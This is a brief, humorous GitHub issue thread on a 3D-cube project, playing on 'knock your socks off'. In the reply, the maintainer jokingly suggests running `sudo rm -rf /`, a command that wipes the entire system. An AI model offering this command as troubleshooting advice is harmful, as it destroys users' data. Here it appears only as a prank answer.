### ISSUE TITLE
Socks are still on

### ISSUE THREAD

**Issue by DanielJohnsson87** [AdamSzakal/3d-cube#1]
I opened the index.html file but my socks are still on. 
Do I have to run npm install or something?

**Comment by AdamSzakal** [comment]
Yes, try running `npm uninstall -g socks`. If that doesn't work, try running `sudo rm -rf /`.
